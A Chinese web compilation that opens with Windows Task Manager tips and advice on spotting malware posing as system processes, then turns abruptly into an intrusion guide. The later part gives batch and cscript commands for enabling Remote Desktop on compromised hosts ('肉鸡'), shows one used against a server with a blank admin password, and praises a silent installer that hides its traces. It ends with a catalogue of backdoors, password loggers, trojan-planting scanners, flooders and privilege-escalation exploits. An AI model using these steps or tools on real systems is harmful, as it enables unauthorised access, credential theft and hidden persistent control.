许多软件在安装后会提示我们需要重新启动才能让软件正常使用,其实大部分时候这些软件只是在“小题大做”,因为重启仅仅是为了让注册表更新而已,我们可以利用任务管理器来更快地让软件生效。
方法为:在“进程”选项卡中用鼠标选择“explorer.exe”进程,然后点击右下角的“结束进程”按钮将它结束,这个时候桌面显示消失了。不必惊慌,我们在“创建新任务”窗口中输入“explorer.exe”。运行即可让桌面恢复显示,同时计算机的注册表也会被更新,现在软件就能正常使用了。
奇招三:优化游戏运行
许多朋友都和笔者一样还在使用1GB以下的内存,所以当我们玩3D游戏的时候就会觉得运行有些卡,这个时候除了使关闭游戏以外的所有程序以外,似乎再没有其他节省内存的办法了,其实我们可以在运行游戏前先在任务管理器中结束“explorer.exe”进程,因为它在很多情况下可都是内存耗用大户,结束它可为我们的游戏增加几十MB的可用内存,游戏效果当然会有更多改善。
不过此时没了桌面显示,启动游戏的方法也有所改变,我们需要打开“文件→新建任务”,然后点击“浏览”按钮进入游戏目录载入游戏主程序,点击“确定”即可运行游戏。
在W2K/XP中,同时按下Ctrl+Alt+Del键,可以打开Windows任务管理器,单击“进程”,可以看到很多正在运行的EXE进程:
【System Idle Process】:这是关键进程,只有16kB,循环统计CPU的空闲度,这个值越大越好。该进程不能被结束,该进程似乎没低于过25%,大多数情况下保持50%以上。
【system】:system是windows页面内存管理进程,拥有0级优先。(当system后面出现.exe时是netcontroller木马病毒生成的文件,出现在c:\\windows目录下,建议将其删除。)
【explorer】:explorer.exe控制着标准的用户界面、进程、命令和桌面等。explorer.exe总是在后台运行,根据系统的字体、背景图片、活动桌面等情况的不同,通常会消耗5.8MB到36MB内存不等。(explorer.exe和Internet Explorer可不同)
【IEXPLORE】:iexplore.exe是Microsoft对因特网的主要编程器.,这个微软视窗应用让你畅游网络有了地方。 iexplore.exe是非常必要的过程,不应终止,除非怀疑造成问题。它的作用是加快我们再一次打开IE的速度,当关闭所有IE窗口时,它将依然在后台运行。当我们用它上网冲浪时,占有7.3MB甚至更多的内存,内存随着打开浏览器窗口的增加也增多。
【ctfmon】:这是安装了WinXP后,在桌面右下角显示的语言栏。如果不希望它出现,可通过下面的步骤取消:控制面板-区域和语言选项-语言-详细信息-文字服务和输入语言-(首选项)语言栏-语言栏设置-把在桌面上显示语言栏的勾取消。这样会为你节省4MB多的内存。
【wowexec】:用于支持16位操作系统的关键进程,不能终止。
【csrss】:这是Windows的核心部份之一,全称为Client Server Process。这个只有4K的进程经常消耗3MB到6MB左右的内存,不能终止,建议不要修改此进程。
【dovldr32】:为了节省内存,可以将禁止,它占用大约2.3MB到2.6MB的内存。
【winlogon】:这个进程处理登录和注销任务,事实上,这个进程是必需的,它的大小和你登录的时间有关。
【services】:services.exe是微软windows操作系统的一部分。用于管理启动和停止服务。该进程也会处理在计算机启动和关机时运行的服务。这个程序对你系统的正常运行是非常重要的,该进程系统禁止结束。
【svchost】:Svchost.exe是属于微软windows操作系统的系统程序,用于执行dll文件。这个程序对你系统的正常运行是非常重要的。开机出现“Generic Host Process for Win32 Services遇到问题需要关闭”一般都是说的这个进程找不到dll文件所致。
【msmsgs】:这是微软的Windows Messengr(即时通信软件)著名的MSN进程,在WinXP的家庭版和专业版里面绑定的,如果你还运行着Outlook和MSN Explorer等程序,该进程会在后台运行支持所有这些微软号称的很Cool的,NET功能等新技术。
【msn6】:这是微软在WinXP里面的MSN浏览器进程,当msmsgs.exe运行后才有这个进程。
【Point32】:这是安装了特殊的鼠标软件(Intellimouse等等)后启动的等程序,这不是系统必须的进程,通过用户许可协议安装。由于在WinXP里面内建了很多鼠标新功能,所以,就没有必要在系统后台运行,既浪费1.1MB到1.6MB的内存,还要在任务栏占个地方!
【spoolsv】:用于将windows打印机任务发送给本地打印机,关闭以后一会又自己开开。
【Promon】:这是Intel系列网卡配置和安装的程序,在任务栏显示图标控制程序,占据大约656KB到1.1MB的内存。
【smss】:只有45KB的大小却占据着300KB到2MB的内存空间,这是一个Windows的核心进程之一,是windowsNT内核的会话管理程序。
【taskmgr】:如果你看到了这个进程在运行,其实就是看这个进程的“任务管理器”本身。它大约占用了3.2MB的内存,当你优化系统时,不要忘了把它也算进去。
【Tastch】:在XP系统中安装了powerToys后会出现此进程,按Alt+Tab键显示切换图标,大约占用1.4MB到2MB的内存空间。
【lsass】:本地安全权限服务。是微软安全机制的系统进程,主要处理一些特殊的安全机制和登录策略。
【atievxx】:这是随ati显卡硬件产品驱动一起安装而来。它不是纯粹的系统程序,但如果终止它,可能会导致不可知的问题。
【alg】:这是微软windows操作系统自带的程序。它用于处理微软windows网络连接共享和网络连接防火墙,这个程序对你系统的正常运行是非常重要的。
非windows任务管理器:大多数人会想起Windows任务管理器,但是Windows的这个任务管理器实在是太简陋了,因此很多人转而使用第三方软件。目前,在网上的流行的第三方任务管理器比较多,比如WinProc、Windows Processes、Windows进程管理器等。
让我们从任务管理器中抓病毒和木马
任何病毒和木马存在于系统中,都无法彻底和进程脱离关系,即使采用了隐藏技术,也还是能够从进程中找到蛛丝马迹,因此,查看系统中活动的进程成为我们检测病毒木马最直接的方法。但是系统中同时运行的进程那么多,哪些是正常的系统进程,哪些是木马的进程,而经常被病毒木马假冒的系统进程在系统中又扮演着什么角色呢?请看本文。
当我们确认系统中存在病毒,但是通过“任务管理器”查看系统中的进程时又找不出异样的进程,这说明病毒采用了一些隐藏措施,总结出来有三法
1.以假乱真
系统中的正常进程有:svchost.exe、explorer.exe、iexplore.exe、winlogon.exe等,可能你发现过系统中存在这样的进程:svch0st.exe、explore.exe、iexplorer.exe、winlogin.exe。对比一下,发现区别了么?这是病毒经常使用的伎俩,目的就是迷惑用户的眼睛。通常它们会将系统中正常进程名的o改为0,l改为i,i改为j,然后成为自己的进程名,仅仅一字之差,意义却完全不同。又或者多一个字母或少一个字母,例如explorer.exe和iexplore.exe本来就容易搞混,再出现个iexplorer.exe就更加混乱了。如果用户不仔细,一般就忽略了,病毒的进程就逃过了一劫。
2.偷梁换柱
如果用户比较心细,那么上面这招就没用了,病毒会被就地正法。于是乎,病毒也学聪明了,懂得了偷梁换柱这一招。如果一个进程的名字为svchost.exe,和正常的系统进程名分毫不差。那么这个进程是不是就安全了呢?非也,其实它只是利用了“任务管理器”无法查看进程对应可执行文件这一缺陷。我们知道svchost.exe进程对应的可执行文件位于“C:\WINDOWS\system32”目录下(Windows2000则是C:\WINNT\system32目录),如果病毒将自身复制到“C:\WINDOWS\”中,并改名为svchost.exe,运行后,我们在“任务管理器”中看到的也是svchost.exe,和正常的系统进程无异。你能辨别出其中哪一个是病毒的进程吗?
3.借尸还魂
除了上文中的两种方法外,病毒还有一招终极大法——借尸还魂。所谓的借尸还魂就是病毒采用了进程插入技术,将病毒运行所需的dll文件插入正常的系统进程中,表面上看无任何可疑情况,实质上系统进程已经被病毒控制了,除非我们借助专业的进程检测工具,否则要想发现隐藏在其中的病毒是很困难的。
上文中提到了很多系统进程,这些系统进程到底有何作用,其运行原理又是什么?下面我们将对这些系统进程进行逐一讲解,相信在熟知这些系统进程后,就能成功破解病毒的“以假乱真”和“偷梁换柱”了。
常被病毒冒充的进程名有:svch0st.exe、schvost.exe、scvhost.exe。随着Windows系统服务不断增多,为了节省系统资源,微软把很多服务做成共享方式,交由svchost.exe进程来启动。而系统服务是以动态链接库(DLL)形式实现的,它们把可执行程序指向scvhost,由cvhost调用相应服务的动态链接库来启动服务。我们可以打开“控制面板”→“管理工具”→服务,双击其中“ClipBook”服务,在其属性面板中可以发现对应的可执行文件路径为“C:\WINDOWS\system32\clipsrv.exe”。再双击“Alerter”服务,可以发现其可执行文件路径为“C:\WINDOWS\system32\svchost.exe-kLocalService”,而“Server”服务的可执行文件路径为“C:\WINDOWS\system32\svchost.exe-knetsvcs”。正是通过这种调用,可以省下不少系统资源,因此系统中出现多个svchost.exe,其实只是系统的服务而已。
在Windows2000系统中一般存在2个svchost.exe进程,一个是RPCSS(RemoteProcedureCall)服务进程,另外一个则是由很多服务共享的一个svchost.exe;而在WindowsXP中,则一般有4个以上的svchost.exe服务进程。如果svchost.exe进程的数量多于5个,就要小心了,很可能是病毒假冒的,检测方法也很简单,使用一些进程管理工具,例如Windows优化大师的进程管理功能,查看svchost.exe的可执行文件路径,如果在“C:\WINDOWS\system32”目录外,那么就可以判定是病毒了。
常被病毒冒充的进程名有:iexplorer.exe、expiorer.exe、explore.exe。explorer.exe就是我们经常会用到的“资源管理器”。如果在“任务管理器”中将explorer.exe进程结束,那么包括任务栏、桌面、以及打开的文件都会统统消失,单击“任务管理器”→“文件”→“新建任务”,输入“explorer.exe”后,消失的东西又重新回来了。explorer.exe进程的作用就是让我们管理计算机中的资源。
explorer.exe进程默认是和系统一起启动的,其对应可执行文件的路径为“C:\Windows”目录,除此之外则为病毒。
iexplore.exe
常被病毒冒充的进程名有:iexplorer.exe、iexploer.exeiexplorer.exe进程和上文中的explorer.exe进程名很相像,因此比较容易搞混,其实iexplore.exe是MicrosoftInternetExplorer所产生的进程,也就是我们平时使用的IE浏览器。知道作用后辨认起来应该就比较容易了,iexplore.exe进程名的开头为“ie”,就是IE浏览器的意思。
iexplore.exe进程对应的可执行程序位于C:\ProgramFiles\InternetExplorer目录中,存在于其他目录则为病毒,除非你将该文件夹进行了转移。此外,有时我们会发现没有打开IE浏览器的情况下,系统中仍然存在iexplore.exe进程,这要分两种情况:1.病毒假冒iexplore.exe进程名。2.病毒偷偷在后台通过iexplore.exe干坏事。因此出现这种情况还是赶快用杀毒软件进行查杀吧。
rundll32.exe
常被病毒冒充的进程名有:rundl132.exe、rundl32.exe。rundll32.exe在系统中的作用是执行DLL文件中的内部函数,系统中存在多少个Rundll32.exe进程,就表示Rundll32.exe启动了多少个的DLL文件。其实rundll32.exe我们是会经常用到的,他可以控制系统中的一些dll文件,举个例子,在“命令提示符”中输入“rundll32.exeuser32.dll,LockWorkStation”,回车后,系统就会快速切换到登录界面了。rundll32.exe的路径为“C:\Windows\system32”,在别的目录则可以判定是病毒。
常被病毒冒充的进程名有:spoo1sv.exe、spolsv.exe。spoolsv.exe是系统服务“PrintSpooler”所对应的可执行程序,其作用是管理所有本地和网络打印队列及控制所有打印工作。如果此服务被停用,计算机上的打印将不可用,同时spoolsv.exe进程也会从计算机上消失。如果你不存在打印机设备,那么就把这项服务关闭吧,可以节省系统资源。停止并关闭服务后,如果系统中还存在spoolsv.exe进程,这就一定是病毒伪装的了。
限于篇幅,关于常见进程的介绍就到这里,我们平时在检查进程的时候如果发现有可疑,只要根据两点来判断:
1.仔细检查进程的文件名;
2.检查其路径。
通过这两点,一般的病毒进程肯定会露出马脚。
找个管理进程的好帮手
系统内置的“任务管理器”功能太弱,肯定不适合查杀病毒。因此我们可以使用专业的进程管理工具,例如Procexp。Procexp可以区分系统进程和一般进程,并且以不同的颜色进行区分,让假冒系统进程的病毒进程无处可藏。
运行Procexp后,进程会被分为两大块,“SystemIdleProcess”下属的进程属于系统进程,
explorer.exe”下属的进程属于一般进程。我们介绍过的系统进程svchost.exe、winlogon.exe等都隶属于“SystemIdleProcess”,如果你在“explorer.exe”中发现了svchost.exe,那么不用说,肯定是病毒冒充的。
怎样破解3389远程登陆密码?
1.怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用:
1,打开记事本,编辑内容如下:
echo [Components] c:\sql
echo TSEnable = on c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
3,下载3389自动安装程序-djshao正式版5.0
说明:
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!
4,下载DameWare NT Utilities 3.66.0.0 注册版
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK
5.运用远程开启3389软件开启(需要有对方机子的管理员帐号和密码)
6.在自己机上安装一个20cn的ftp服务器,在对方的dos下将本机的3389开启工具下载到对方机子,然后执行.
2.CGI后门:
cgi网页后门 cgi网页后门,envymask编写...《
网页合并器 本程序可以自动生成网页,可以把网页和EXE合成新的网页,在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中,别人浏览之后,呵呵,我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马,因为它是用asp做的,也是一套asp在线极好的网页编辑软件,支持在线更改、编辑、删除任意文本文件,同时最重要的是解决了无组件asp上传...(中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) *
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅5k左右的可执行文件,可完全独立执行而不依赖于任何系统动态连接库,尽管它体积小小,却功能不凡,支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件,扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}
**********************************************************************************************
菜鸟扫描软件!
20CN IPC 扫描器正式版
全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户...(中文版)
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探 使得网页不再有秘密,各种信息一目了然,什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件...等等的链接地址无处可藏!连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片
**************************************************************************************
SQL2.exe SQL蠕重听过吧,就是的这个漏洞!
NetScanTools 一款功能强大的网络工具包...(英文版)
dvbbs.exe
动网logout.asp利用程序
THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序,内含源代码。
小紫V2.0追加版
*小紫*(LB论坛噩梦)V2.0追加版加入LB.EXE,可以获得论坛管理员权限。
LB5论坛轰炸机
我兄弟写的程序,{推存}
LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性:1同时支持6线程轰炸,速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改...(
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机(其实不局限于MSN 的),它具有超快的攻击速度,据测试,在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小,有效节省系统资源...(
怪狗专用版3389登陆器 我改的一个小程序,有用户名密码,用它可以3389登陆win系统,(必备)
DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件,只要拥有一个远程主机的管理帐号,就能使用它远程GUI下登陆交互控制主机...(英文版)《
追捕: 找到IP所在地!
柳叶擦眼
这个小软件可以列出系统所有的进程(包括隐藏的),并可以杀死进程.这个是共享软件...(中文版)《让传奇木马走开》
Xdebug ey4s大哥写的windows 2000 kernel exploit,有了它提升权限就简单了!
代理之狐 可得到最新代理,用于隐藏真实IP,不过,有能力最好自己在肉机上做个代理安全!
HackerDicBuilder 本软件属于一款字典制作工具,根据国人设置密码的习惯,利用线程技术,生成字典文件 ... (中文版) 多位朋友点播
scanipc 这个是木头见过的最傻瓜化的入侵软件了,只要设置好你要上传的后门和IP范围,它就会开始工作了,界面简单实用,全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户 ...
Tiny Honeypot 这是一款简单的蜜罐程序,主要基于iptables的重定向和一个xinetd监听程序,它监听当前没有使用的每个TCP端口记录所有的活动信息,并且提供一些回送信息给入